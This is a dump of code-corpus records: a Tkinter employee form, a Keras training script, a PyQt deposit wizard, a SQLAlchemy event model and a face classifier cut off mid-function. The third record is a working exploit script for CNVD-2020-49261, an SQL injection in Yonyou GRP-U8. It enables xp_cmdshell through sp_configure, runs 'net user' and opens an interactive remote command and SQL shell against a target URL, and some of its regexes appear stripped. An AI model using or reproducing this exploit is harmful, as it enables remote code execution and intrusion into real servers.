font=(\"Andalus\",24,'bold'),fg=\"white\",bg=\"#339900\",borderwidth=10)\n self.head_label.place(x=0,y=20,width=880)\n \n self.name_label=Label(self.frame_emp,text=\"First Name\",font=(\"Andalus\",12,'bold'),fg=\"black\")\n self.name_label.place(x=20,y=100)\n \n self.mname_label=Label(self.frame_emp,text=\"Middle Name\",font=(\"Andalus\",12,'bold'),fg=\"black\")\n self.mname_label.place(x=20,y=185)\n \n self.lname_label=Label(self.frame_emp,text=\"Last Name\",font=(\"Andalus\",12,'bold'),fg=\"black\") \n self.lname_label.place(x=20,y=270)\n\n self.gender_label=Label(self.frame_emp,text=\"Sex\",font=(\"Andalus\",12,'bold'),fg=\"black\")\n self.gender_label.place(x=20,y=350)\n\n self.bdate_label=Label(self.frame_emp,text=\"Birth Date\",font=(\"Andalus\",12,'bold'),fg=\"black\") \n self.bdate_label.place(x=20,y=430)\n\n self.address_label=Label(self.frame_emp,text=\"Address\",font=(\"Andalus\",12,'bold'),fg=\"black\") \n self.address_label.place(x=20,y=510)\n\n #label sa right side ng employee frame\n self.department_label=Label(self.frame_emp,text=\"Department\",font=(\"Andalus\",12,'bold'),fg=\"black\") \n self.department_label.place(x=350,y=95)\n\n self.position_label=Label(self.frame_emp,text=\"Position\",font=(\"Andalus\",12,'bold'),fg=\"black\")\n self.position_label.place(x=350,y=181)\n\n self.Salary_label=Label(self.frame_emp,text=\"Salary Grade\",font=(\"Andalus\",12,'bold'),fg=\"black\")\n self.Salary_label.place(x=350,y=265)\n\n self.email_label=Label(self.frame_emp,text=\"Email Address\",font=(\"Andalus\",12,'bold'),fg=\"black\")\n self.email_label.place(x=350,y=350)\n\n self.contact_label=Label(self.frame_emp,text=\"Contact Details\",font=(\"Andalus\",12,'bold'),fg=\"black\")\n self.contact_label.place(x=350,y=435)\n\n self.picbox_label=Label(self.frame_emp,text=\"\",bg=\"darkgreen\")\n self.picbox_label.place(x=680,y=125, width=130,height=130)\n \n\n #Mga Entry box para sa pag insert\n self.name_entry=Entry(self.frame_emp,font=(\"calibri\",14),borderwidth=5)\n self.name_entry.place(x=20,y=135,width=250)\n\n self.mname_entry=Entry(self.frame_emp,font=(\"calibri\",14),borderwidth=5)\n self.mname_entry.place(x=20,y=220,width=250)\n\n self.lname_entry=Entry(self.frame_emp,font=(\"calibri\",14),borderwidth=5)\n self.lname_entry.place(x=20,y=305,width=250)\n\n self.birthdate_entry=Entry(self.frame_emp,font=(\"calibri\",14),borderwidth=5)\n self.birthdate_entry.place(x=20,y=465,width=250)\n\n self.address_entry=Entry(self.frame_emp,font=(\"calibri\",14),borderwidth=5)\n self.address_entry.place(x=20,y=550,width=250)\n\n #entry box for employee registration right side\n self.email_entry=Entry(self.frame_emp,font=(\"calibri\",14),borderwidth=5)\n self.email_entry.place(x=350,y=382,width=250)\n\n self.email_entry=Entry(self.frame_emp,font=(\"calibri\",14),borderwidth=5)\n self.email_entry.place(x=350,y=463,width=250)\n\n #combo box for department options\n options_dep = [\n \"\",\n \"SICS\",\n \"SED\",\n \"SENG\"\n ]\n self.dep_cbox= ttk.Combobox(self.frame_emp,value=options_dep)\n self.dep_cbox.current(0)\n self.dep_cbox.place(x=350,y=131,width=250,height=31)\n \n #combo box for positions options\n options_position = [\n \"\",\n \"Support Staff\",\n \"College Lecturer\",\n \"Instructor I\"\n ]\n self.position_cbox= ttk.Combobox(self.frame_emp,value=options_position)\n self.position_cbox.current(0)\n self.position_cbox.place(x=350,y=216,width=250,height=31)\n\n #combo box for salary Grade\n options_salaryg = [\n \"\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\n \"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\",\"18\"\n ]\n self.salaryg_cbox= ttk.Combobox(self.frame_emp,value=options_salaryg)\n self.salaryg_cbox.current(0)\n self.salaryg_cbox.place(x=350,y=302,width=250,height=31)\n\n #combo box for department options\n options_gender = [\n \"\",\"MALE\",\n \"FEMALE\"\n ]\n self.gender_cbox= ttk.Combobox(self.frame_emp,value=options_gender)\n self.gender_cbox.current(0)\n self.gender_cbox.place(x=20,y=385,width=250,height=31)\n\n \n \n \n\n #Register button for the employee registration\n self.btn_save = Button(self.frame_emp, text=\"Register\",borderwidth=3,relief=GROOVE,activebackground=\"#0B0F08\",\n activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold'),command=clicked_emp)\n self.btn_save.place(x=20,y=610,width=250,height=50)\n\n\n def clicked_dep():\n self.frame_dep.lift()\n def clicked_pos():\n self.frame_pos.lift()\n \n \n #Container for Main button example: Home,Employee etc.\n self.canvas = Canvas(self.root)\n self.canvas.place(x=10,y=10,width=300,height=680)\n #ito ung sa image na png\n \n self.image1=ImageTk.PhotoImage(file=\"msclogo1.png\")\n self.label1=Label(self.canvas,image=self.image1,borderwidth=10)\n self.label1.place(x=75,y=5)\n\n\n #Home button\n self.Home = Button(self.canvas, text=\"HOME\",borderwidth=5,relief=GROOVE, activebackground=\"#0B0F08\",\n activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold'),command=clicked_home)\n self.Home.place(x=10,y=150,width=280,height=60)\n \n \n \n #employee button\n self.employee = Button(self.canvas, text=\"EMPLOYEE\",borderwidth=5,relief=GROOVE,activebackground=\"#0B0F08\",\n activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold'),command=clicked_emp)\n self.employee.place(x=10,y=210,width=280,height=60)\n \n\n #employee button\n self.department = Button(self.canvas, text=\"DEPARTMENT\",borderwidth=5,relief=GROOVE,\n activebackground=\"#0B0F08\",activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold')\n ,command=clicked_dep)\n self.department.place(x=10,y=270,width=280,height=60)\n\n #employee button\n self.post = Button(self.canvas, text=\"POSITION\",borderwidth=5,relief=GROOVE, \n activebackground=\"#0B0F08\",activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold')\n ,command=clicked_pos)\n self.post.place(x=10,y=330,width=280,height=60)\n\n #employee button\n self.settings = Button(self.canvas, text=\"SETTINGS\",borderwidth=5,relief=GROOVE,\n activebackground=\"#0B0F08\",activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold'))\n self.settings.place(x=10,y=390,width=280,height=60)\n\n #employee button \n self.event = Button(self.canvas, text=\"EVENT\",borderwidth=5,relief=GROOVE,\n activebackground=\"#0B0F08\",activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold'))\n self.event.place(x=10,y=450,width=280,height=60)\n\n #employee button\n self.employee = Button(self.canvas, text=\"STUDENT\",borderwidth=5,relief=GROOVE, activebackground=\"#0B0F08\",activeforeground=\"white\",fg=\"white\",bg=\"green\",font=(\"arial\",15,'bold'))\n self.employee.place(x=10,y=510,width=280,height=60)\n\n \n #####Frame para sa Main Button#####\n #frame for position info\n self.frame_pos = Frame(self.root,borderwidth=10,bg=\"red\")\n self.frame_pos.place(x=320,y=10,width=870,height=680)\n #frame for department info\n self.frame_dep = Frame(self.root,borderwidth=10,bg=\"yellow\")\n self.frame_dep.place(x=320,y=10,width=870,height=680)\n #frame for employee info\n self.frame_emp = Frame(self.root)\n self.frame_emp.place(x=320,y=10,width=870,height=680)\n #frame for home info\n self.frame_home = Frame(self.root)\n self.frame_home.place(x=320,y=10,width=870,height=680)\n\n \n \n\n \n \n\n \n\n\nmain=MainWindow(root)\nroot.mainloop()","sub_path":"Mainwindow.py","file_name":"Mainwindow.py","file_ext":"py","file_size_in_byte":9468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"383994917","text":"from silence_tensorflow import silence_tensorflow\n\nsilence_tensorflow()\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Activation, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nimport numpy as np\nfrom tensorflow.keras import callbacks\nfrom tensorflow.keras.callbacks import TensorBoard, CSVLogger\nimport GPU_RESET\nimport shutil\nimport os\nimport datetime\nfrom time import *\n\n# from time import ctime, time\nGPU_RESET.reset_keras()\n\n########## VIEW RESULTS : tensorboard --logdir=logs/. ######### tensorboard --logdir=models/. ######################\n\nfdirs = ['F:/### Sanabil Dissertation/Image Dataset/Blobs/Learning/Train',\n 'F:/### Sanabil Dissertation/Image Dataset/Crack/Learning/Train',\n 'F:/### Sanabil Dissertation/Image Dataset/Burns/Learning/Train']\n\n# fdirs = ['F:/### Sanabil Dissertation/Image Dataset/BMega/Learning/Train',\n# 'F:/### Sanabil Dissertation/Image Dataset/BMedm/Learning/Train']\n\nNumpyData = 'F:/### Sanabil Dissertation/Disso_Scripts/Main_Code/NumpyData'\n\nif os.path.isdir('models/') == True:\n shutil.rmtree('models/')\n os.makedirs('models')\nelse:\n os.makedirs('models')\n\nfor fdir in fdirs:\n input_X = f'{NumpyData}' + '/X-Data-' + f'{fdir[-20:-15]}.npy'\n input_y = f'{NumpyData}' + '/y-Data-' + f'{fdir[-20:-15]}.npy'\n\n print(input_X)\n print(input_y)\n\n X = np.load(input_X)\n y = np.load(input_y)\n X = X / 255.0\n\n EPOCHS = 10\n\n dense_layers = [0, 1, 2]\n layer_sizes = [16, 32, 64, 128]\n conv_layers = [1, 2, 3]\n optimlist = ['adam', 'SGD', 'RMSprop']\n #\n # dense_layers = [1]\n # layer_sizes = [32]\n # conv_layers = [1,2]\n # optimlist = ['adam']\n\n for dense_layer in dense_layers:\n for layer_size in layer_sizes:\n for conv_layer in conv_layers:\n for optimchoice in optimlist:\n GPU_RESET.reset_keras()\n sleep(5)\n t = time()\n ctime(t)\n datagen = 'Mon Mar 29 20_35_01 2021'\n # NAME = \"{}-{}-conv-{}-nodes-{}-dense-{}-optimizer-{}-epochs-{}\".format(fdir[-20:-15],conv_layer, layer_size, dense_layer, optimchoice, EPOCHS, str(ctime(t)).replace(\":\",\"_\"))\n NAME = \"{}-{}-conv-{}-nodes-{}-dense-{}-optimizer-{}-epochs-{}\".format(fdir[-20:-15], conv_layer, layer_size, dense_layer, optimchoice, EPOCHS, datagen)\n\n tensorboard = TensorBoard(log_dir=\"models/{}/{}.model\".format(fdir[-20:-15], NAME))\n csv_logger = CSVLogger('./models/' + f'{fdir[-20:-15]}/' + f'{NAME}.model/' + f'{NAME}.log', append=True)\n\n print(NAME)\n\n model = Sequential()\n\n model.add(Conv2D(layer_size, (5, 5), input_shape=X.shape[1:]))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n for l in range(conv_layer - 1):\n model.add(Conv2D(layer_size, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Flatten())\n\n for l in range(dense_layer):\n model.add(Dense(layer_size))\n model.add(Activation('relu'))\n model.add(Dropout(0.8))\n\n model.add(Dense(1))\n model.add(Activation('sigmoid'))\n\n metriclist = ['accuracy', 'mean_absolute_error', 'mean_absolute_percentage_error']\n checkpoint_filepath = \"models/{}/{}.model\".format(fdir[-20:-15], NAME)\n model_checkpoint_callback = callbacks.ModelCheckpoint(\n filepath=checkpoint_filepath,\n save_weights_only=False,\n metric=metriclist,\n mode='auto',\n save_best_only=False)\n\n model.compile(loss='binary_crossentropy',\n optimizer=optimchoice,\n metrics=metriclist,\n )\n\n model.fit(X, y,\n batch_size=64,\n epochs=EPOCHS,\n validation_split=0.1,\n callbacks=[tensorboard, model_checkpoint_callback, csv_logger])\n\n model.save(\"models/{}/{}.model\".format(fdir[-20:-15], NAME))\n # GPU_RESET.reset_keras()\n","sub_path":"Tensorflow Model Training.py","file_name":"Tensorflow Model Training.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"605156575","text":"# -*- coding: utf-8 -*- \n__Author__=\"p4ssw0rd\"\nimport requests\nimport sys\nimport urllib3\nimport re\nfrom html.parser import HTMLParser\n\nurllib3.disable_warnings()\nsession = requests.session()\nurl=\"http://127.0.0.1/\"\nheaders = {\"Content-Type\": \"application/x-www-form-urlencoded\", \"User-Agent\": \"Mozilla/5.0 (compatible; MSIE 6.0;)\", \"Connection\": \"Keep-Alive\", \"Cache-Control\": \"no-cache\"}\npayloadCheck_xp_cmdshell=\"select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';\"\npayloadOpen_xp_cmdshell=\"exec sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure'xp_cmdshell', 1;RECONFIGURE;\"\npayloadCheck_privilage=\"select user;\"\npayloadGetNetUser=\"exec master..xp_cmdshell 'net user';\"\npayloadStatus_xp_cmdshell=r\"select * from master..sysconfigures where comment like '%show advanced options%' or comment like '%xp_cmdshell%';\"\nglobal CommandExecution\n\n# 数据处理\ndef dataHandler(payload):\n data = {\"cVer\": \"9.8.0\", \"dp\": \"XMLAS_DataRequestProviderNameDataSetProviderDataData%s\"% payload} \n return HTMLParser().unescape(session.post(url, headers=headers, data=data,verify=False,).content.decode(\"utf8\",\"ignore\"))\n\n\n# 判断当前用户权限\ndef Check_privilage():\n content = dataHandler(payloadCheck_privilage)\n privilages = re.findall('',content)\n if len(privilages)==0:\n userDefinePayload()\n elif privilages[0]==\"dbo\":\n print(\"[+]恭喜,当前权限为dbo\")\n else:\n print(\"[+]当前权限为%s\" % privilages[0])\n# 判断xp_cmdshell是否禁用\ndef Check_xp_cmdshell():\n if '' in dataHandler(payloadCheck_xp_cmdshell):\n print(\"[+]xp_cmdshell已安装.\")\n else:\n print(\"[-]xp_cmdshell未安装.\")\n userDefinePayload()\n# 判断xp_cmdshell是否开启\ndef Status_xp_cmdshell():\n content = dataHandler(payloadStatus_xp_cmdshell)\n status = re.findall(\"(.*?)\",content)\n if len(results)==0:\n print(\"[-]执行命令失败,请手工验证\")\n userDefinePayload()\n else:\n result = re.findall('',results[0])\n for i in result:\n print(i) \n# 出现错误时自定义payload\ndef userDefinePayload():\n print(\"[*]请输入sql语句,输入exit()退出\")\n sql = input(\">\")\n while sql!=\"exit()\":\n print(dataHandler(sql)) \n sql = input(\">\")\n exit(0)\ndef urlHandle(url):\n while url[-1]==\"/\":\n url = url[:-1]\n return url+\"/Proxy\"\nif __name__ == \"__main__\":\n if len(sys.argv)<2:\n print(\"[*]usage : python3 %s http://127.0.0.1/\" % __file__)\n else:\n url = urlHandle(sys.argv[1])\n Check_privilage()\n Check_xp_cmdshell()\n Status_xp_cmdshell()\n Get_net_user()\n print(\"[*]正在尝试使用xp_cmdshell命令执行\") \n CommandExecution\n if CommandExecution == True:\n print(\"[*]请输入命令,输入exit()退出\")\n command = input(\">\")\n while command!=\"exit()\":\n Get_CommandResult(command)\n command = input(\">\")\n exit(0)\n else:\n print(\"[-]失败\")\n userDefinePayload()\n","sub_path":"用友GRP-8注入/CNVD-2020-49261_exp.py","file_name":"CNVD-2020-49261_exp.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"612771121","text":"from PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QMdiSubWindow\n\nfrom sqlalchemy import exc\n\nfrom Celda.src.Library.DataORM import *\n\nfrom Celda.src.GUI.ui.Util import show_dialog\nfrom Celda.src.GUI.ui.WizardEntrySlotCase import WizardEntrySlotCase\n\n\nclass ControlWizardEntrySlotCase:\n\n def __init__(self, enginedb, mdi_area):\n self.enginedb = enginedb\n self.mdi_area = mdi_area\n self.container_widget = None\n self.currentDeposit = None\n self.slot_case = None\n self.sub = None\n\n def init(self):\n self.container_widget = None\n self.currentDeposit = None\n self.slot_case = None\n self.sub = None\n\n def show_wizard_entry_slot_case(self):\n if self.sub is None:\n self.sub = QMdiSubWindow()\n self.container_widget = WizardEntrySlotCase()\n self.container_widget.pushButtonAcceptBarCode.clicked.connect(self.on_accept_barcode)\n self.container_widget.pushButtonDepositScan.clicked.connect(self.on_deposit_scan)\n self.container_widget.pushButtonDepositBack.clicked.connect(self.on_deposit_back)\n self.container_widget.pushButtonDepositCancel.clicked.connect(self.on_deposit_cancel)\n self.container_widget.pushButtonDepositOK.clicked.connect(self.on_deposit_ok)\n self.container_widget.pushButtonSlotsBack.clicked.connect(self.on_slots_back)\n self.container_widget.pushButtonSlotsCancel.clicked.connect(self.on_slots_cancel)\n self.container_widget.pushButtonSlotsNewDeposit.clicked.connect(self.on_slots_new_deposit)\n self.container_widget.pushButtonSlotsNewSlotCase.clicked.connect(\n lambda: (self.on_slots_new_slot_case(), self.sub.close()))\n self.sub.setWidget(self.container_widget)\n self.sub.setWindowTitle(\"Wizard Ingreso Maletas\")\n self.mdi_area.addSubWindow(self.sub)\n self.sub.showMaximized()\n self.sub.closeEvent = self.close_event\n\n def close_event(self, event):\n self.sub.close()\n self.init()\n\n def save_data(self):\n if self.currentDeposit is not None:\n session = self.enginedb.get_session()\n try:\n session.add(self.currentDeposit)\n session.flush()\n for slot in self.container_widget.get_slots_enables():\n if not slot.is_empty:\n slot.deposit = self.currentDeposit\n session.add(slot)\n session.commit()\n return True\n except exc.SQLAlchemyError as e:\n session.rollback()\n show_dialog(message=\"Se produjo un error al guardar los datos de la maleta en la base de datos\",\n title=\"Error\", detailed=str(e),\n icon=QtWidgets.QMessageBox.Critical)\n return False\n finally:\n session.close()\n\n def go_slot_case_widget(self, clear=True):\n if clear:\n self.container_widget.clear_deposit_widget()\n self.container_widget.setCurrentIndex(self.container_widget.WIDGET_SLOT_CASE)\n\n def on_slots_new_deposit(self):\n pass\n\n def on_slots_new_slot_case(self):\n if not self.container_widget.has_slots_selected():\n ret = show_dialog(message=\n \"Recuerde seleccionar un slot para el deposito actual\",\n title=\"Nueva Maleta\",\n buttons=QtWidgets.QMessageBox.Ok,\n icon=QtWidgets.QMessageBox.Information)\n else:\n if self.container_widget.has_slots_available():\n ret = show_dialog(message=\n \"Todavía existen slot disponibles ¿Está seguro de guardar esta maleta?\",\n title=\"Nueva Maleta\",\n buttons=QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel,\n icon=QtWidgets.QMessageBox.Question)\n if ret == QtWidgets.QMessageBox.Yes:\n if self.save_data(): # Save slot case\n self.go_slot_case_widget()\n else:\n ret = show_dialog(message=\n \"¿Desea mantener la información del deposito actual para la próxima maleta?\",\n title=\"Nueva Maleta\",\n buttons=QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel,\n icon=QtWidgets.QMessageBox.Question)\n if ret == QtWidgets.QMessageBox.Yes:\n if self.save_data():\n self.go_slot_case_widget()\n elif ret == QtWidgets.QMessageBox.No:\n if self.save_data():\n self.currentDeposit = None\n self.go_slot_case_widget()\n\n def on_slots_cancel(self):\n self.container_widget.clear_slots_widget()\n self.on_deposit_cancel()\n\n def on_slots_back(self):\n self.currentDeposit = None\n self.container_widget.setCurrentIndex(self.container_widget.WIDGET_DEPOSIT)\n\n def on_deposit_ok(self):\n account_id = self.container_widget.lineEditDepositAccountID.text()\n amount = self.container_widget.lineEditDepositAmount.text()\n name = self.container_widget.lineEditDepositName.text()\n try:\n account = Account.get(enginedb=self.enginedb, account_id=account_id)\n if account is None:\n show_dialog(message=\"No existe la cuenta {}\".format(account_id), title=\"Aviso\",\n icon=QtWidgets.QMessageBox.Information)\n else:\n self.currentDeposit = Deposit(amount=amount, account=account, name=name)\n self.container_widget.update_slot(slot_case=self.slot_case, deposit=self.currentDeposit)\n self.container_widget.setCurrentIndex(self.container_widget.WIDGET_SLOTS)\n except Exception as e:\n show_dialog(message=\"Error durante el proceso de ingreso de deposito\", title=\"Error\", detailed=str(e),\n icon=QtWidgets.QMessageBox.Critical)\n\n def on_deposit_back(self):\n self.container_widget.setCurrentIndex(self.container_widget.WIDGET_SLOT_CASE)\n\n def on_deposit_cancel(self):\n self.currentDeposit = None\n self.container_widget.clear_deposit_widget()\n self.container_widget.setCurrentIndex(self.container_widget.WIDGET_SLOT_CASE)\n\n def on_deposit_scan(self):\n pass\n\n def on_accept_barcode(self):\n barcode = self.container_widget.lineEditBarcode.text()\n if barcode:\n self.slot_case = SlotCase.get_slot_case(enginedb=self.enginedb, code=barcode)\n if self.slot_case is None:\n show_dialog(message=\"No existe la maleta con código: {}\".format(barcode), title=\"Error\",\n icon=QtWidgets.QMessageBox.Warning)\n elif self.currentDeposit is not None:\n self.container_widget.setCurrentIndex(self.container_widget.WIDGET_SLOTS)\n else:\n self.container_widget.setCurrentIndex(self.container_widget.WIDGET_DEPOSIT)\n","sub_path":"Celda/src/GUI/ui/ControlWizardEntrySlotCase.py","file_name":"ControlWizardEntrySlotCase.py","file_ext":"py","file_size_in_byte":7407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"470337043","text":"from database.database import *\n\n\nclass Event(Base):\n __tablename__ = 'event'\n __table_args__ = {'extend_existing': True}\n\n id = sa.Column(sa.Integer, primary_key=True)\n name = sa.Column(sa.String(256))\n place = sa.Column(sa.String(256))\n date = sa.Column(sa.String(256))\n time = sa.Column(sa.String(256))\n over = sa.Column(sa.Boolean)\n\n @staticmethod\n def add_event(name):\n event = Event(name=name, over=False)\n session.add(event)\n session.commit()\n return event\n\n @staticmethod\n def add_events():\n if len(Event.get_all_events()) > 0:\n return True\n else:\n session.add(Event(name='День донора', place='ауд. 366', date='04.03.20', time='10:30', over=False))\n session.add(Event(name=\"Ярмарок кар'єри\", place='ауд. 512', date='05.04.20', time='10:00-15:00', over=False))\n session.add(Event(name='Турнір з міні-футболу', place='спорткомплекс', date='22.06.20', time='11:00', over=False))\n\n session.commit()\n\n print(\"events added\")\n\n @staticmethod\n def update_event(event_id, name='', place='', date='', time=''):\n event = session.query(Event).get(event_id)\n\n if name != '':\n event.name = name\n elif place != '':\n event.place = place\n elif date != '':\n event.date = date\n elif time != '':\n event.time = time\n\n session.commit()\n\n @staticmethod\n def get_event_id_by_name(name):\n event = session.query(Event).filter(Event.name == name).one()\n return event.id\n\n @staticmethod\n def get_event(event_id):\n return session.query(Event).get(event_id)\n\n @staticmethod\n def get_all_events():\n return [event for event in session.query(Event).all() if event.over is False]\n\n @staticmethod\n def delete_event(event_id):\n event = Event.get_event(event_id)\n event.over = True\n # event_visitors = session.query(EventVisitor).filter(EventVisitor.event_id == event_id)\n #\n # if len(event_visitors.all()) > 0:\n # event_visitors.delete()\n #\n # session.delete(session.query(Event).get(event_id))\n session.commit()\n\n\nBase.metadata.create_all(conn)\n","sub_path":"database/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"427145457","text":"import sys\r\n\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport os\r\n\r\nimport cv2\r\nfrom PyQt5.QtCore import pyqtSlot\r\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog\r\nfrom hipsteOrNot_final import Ui_MainWindow\r\n\r\nclass hipsterOrNot(QMainWindow,Ui_MainWindow):\r\n def __init__(self):\r\n super(hipsterOrNot,self).__init__()\r\n self.setupUi(self)\r\n self.image=None\r\n\r\n self.dirName = None\r\n self.imgFileName = None\r\n\r\n self.last_firmware_directory = None\r\n self.btn_load.clicked.connect(self.loadClicked)\r\n\r\n @pyqtSlot()\r\n def loadClicked(self):\r\n\r\n ret=self.loadImageFile\r\n\r\n print(\"file name\",ret)\r\n if 'p#' in ret:\r\n self.lbl_result.setText(\"Please Load File Properly\")\r\n print('Invalid Image')\r\n else:\r\n self.loadImage(ret)\r\n\r\n @property\r\n def loadImageFile(self):\r\n filter = \"Image files (*.jpg *.png *.jpeg)\"\r\n firmware_dir = None\r\n if self.last_firmware_directory:\r\n firmware_dir = self.last_firmware_directory\r\n\r\n p = QFileDialog.getOpenFileName(parent=self, caption=\"Select Image File\",\r\n directory=firmware_dir, filter=filter)\r\n path = p[0]\r\n if path:\r\n self.last_firmware_directory = \"/\".join(path.split(\"/\")[0:-1])\r\n\r\n if p[0]:\r\n self.imgFileName = p[0]\r\n print(p[0])\r\n return self.imgFileName\r\n else:\r\n print('Invalid Image File')\r\n return \"p#\"\r\n\r\n\r\n def loadImage(self,fname):\r\n self.image=cv2.imread(fname,cv2.IMREAD_COLOR)\r\n self.crop_predict()\r\n\r\n\r\n def addFacePadding(self,cvRect, padding):\r\n cvRect[0] = cvRect[0] - padding # left x\r\n cvRect[1] = cvRect[1] - padding # left y\r\n\r\n cvRect[2] = cvRect[2] + padding # bottom x\r\n cvRect[3] = cvRect[3] + padding # bottom y\r\n\r\n return cvRect\r\n\r\n def predict_image(self, img, debug=True):\r\n\r\n try:\r\n\r\n # Path of training images\r\n train_path = r'./data/train'\r\n if not os.path.exists(train_path):\r\n print(\"No such directory\")\r\n raise Exception\r\n\r\n image_size = 128\r\n num_channels = 3\r\n images = []\r\n\r\n # Resizing the image to our desired size and preprocessing will be done exactly as done during training\r\n image = cv2.resize(img, (image_size, image_size), 0, 0, cv2.INTER_LINEAR)\r\n images.append(image)\r\n images = np.array(images, dtype=np.uint8)\r\n images = images.astype('float32')\r\n images = np.multiply(images, 1.0 / 255.0)\r\n\r\n # The input to the network is of shape [None image_size image_size num_channels]. Hence we reshape.\r\n x_batch = images.reshape(1, image_size, image_size, num_channels)\r\n\r\n # Let us restore the saved model\r\n sess = tf.Session()\r\n # Step-1: Recreate the network graph. At this step only graph is created.\r\n saver = tf.train.import_meta_graph('models/trained_model.meta')\r\n # Step-2: Now let's load the weights saved using the restore method.\r\n saver.restore(sess, tf.train.latest_checkpoint('./models/'))\r\n\r\n # Accessing the default graph which we have restored\r\n graph = tf.get_default_graph()\r\n\r\n # Now, let's get hold of the op that we can be processed to get the output.\r\n y_pred = graph.get_tensor_by_name(\"y_pred:0\")\r\n\r\n ## Let's feed the images to the input placeholders\r\n x = graph.get_tensor_by_name(\"x:0\")\r\n y_true = graph.get_tensor_by_name(\"y_true:0\")\r\n y_test_images = np.zeros((1, len(os.listdir(train_path))))\r\n\r\n # Creating the feed_dict that is required to be fed to calculate y_pred\r\n feed_dict_testing = {x: x_batch, y_true: y_test_images}\r\n result = sess.run(y_pred, feed_dict=feed_dict_testing)\r\n # Result is of this format [[probabiliy_of_classA probability_of_classB ....]]\r\n if debug:\r\n print(result)\r\n\r\n # Convert np.array to list\r\n a = result[0].tolist()\r\n r = 0\r\n\r\n # Finding the maximum of all outputs\r\n max1 = max(a)\r\n index1 = a.index(max1)\r\n predicted_class = None\r\n\r\n # Walk through directory to find the label of the predicted output\r\n count = 0\r\n for root, dirs, files in os.walk(train_path):\r\n for name in dirs:\r\n if count == index1:\r\n predicted_class = name\r\n count += 1\r\n\r\n for i in a:\r\n if i != max1:\r\n if max1 - i < i:\r\n r = 1\r\n if r == 0:\r\n if debug:\r\n print(\"Predicted:\", predicted_class)\r\n else:\r\n if debug:\r\n print(\"Could not classify with definite confidence\")\r\n print(\"Maybe:\", predicted_class)\r\n\r\n return predicted_class\r\n\r\n except Exception as e:\r\n print(\"Exception:\", e)\r\n\r\n def image_resize(self,image, width=None, height=None, inter=cv2.INTER_AREA):\r\n # initialize the dimensions of the image to be resized and\r\n # grab the image size\r\n dim = None\r\n (h, w) = image.shape[:2]\r\n\r\n # if both the width and height are None, then return the\r\n # original image\r\n if width is None and height is None:\r\n return image\r\n\r\n # check to see if the width is None\r\n if width is None:\r\n # calculate the ratio of the height and construct the\r\n # dimensions\r\n r = height / float(h)\r\n dim = (int(w * r), height)\r\n\r\n # otherwise, the height is None\r\n else:\r\n # calculate the ratio of the width and construct the\r\n # dimensions\r\n r = width / float(w)\r\n dim = (width, int(h * r))\r\n\r\n # resize the image\r\n resized = cv2.resize(image, dim, interpolation=inter)\r\n\r\n # return the resized image\r\n return resized\r\n\r\n\r\n def crop_predict(self, padding=1):\r\n count=0\r\n\r\n net = cv2.dnn.readNetFromCaffe(\"./models/deploy.prototxt\",\r\n \"./models/res10_300x300_ssd_iter_140000_fp16.caffemodel\")\r\n\r\n mainImage = self.image.copy()\r\n frameWidth = mainImage.shape[1]\r\n padPercent = int(frameWidth * padding / 100)\r\n\r\n (h, w) = mainImage.shape[:2]\r\n # Call cv2.dnn.blobFromImages():\r\n blob_images = cv2.dnn.blobFromImage(cv2.resize(mainImage, (300, 300)), 1.0, (250, 250), [104., 117., 123.],False,False)\r\n\r\n # Set the blob as input and obtain the detections:\r\n net.setInput(blob_images)\r\n detections = net.forward()\r\n\r\n # print(\"go\",detections.shape[2])\r\n for i in range(0, detections.shape[2]):\r\n confidence = detections[0, 0, i, 2]\r\n\r\n # Filter out weak predictions:\r\n if confidence > 0.7:\r\n count+=1\r\n # Get the size of the current image:\r\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\r\n (startX, startY, endX, endY) = box.astype(\"int\")\r\n\r\n\r\n cvRect = [int(startX), int(startY),\r\n int(endX), int(endY)]\r\n\r\n # cvRect = self.addFacePadding(cvRect, padPercent)\r\n\r\n if cvRect[1] < 0:\r\n cvRect[1] = 0\r\n elif cvRect[2] < 0:\r\n cvRect[2] = 0\r\n elif cvRect[3] < 0:\r\n cvRect[3] = 0\r\n elif cvRect[0] < 0:\r\n cvRect[0] = 0\r\n\r\n y = endY + 15 if endY - 10 > 10 else endY + 15\r\n\r\n print('pos=', h, w)\r\n print('rec', cvRect)\r\n\r\n if cvRect[2] > w or cvRect[3] > h:\r\n print('wrong')\r\n else:\r\n roi = mainImage[cvRect[1]:cvRect[3], cvRect[0]:cvRect[2]]\r\n\r\n 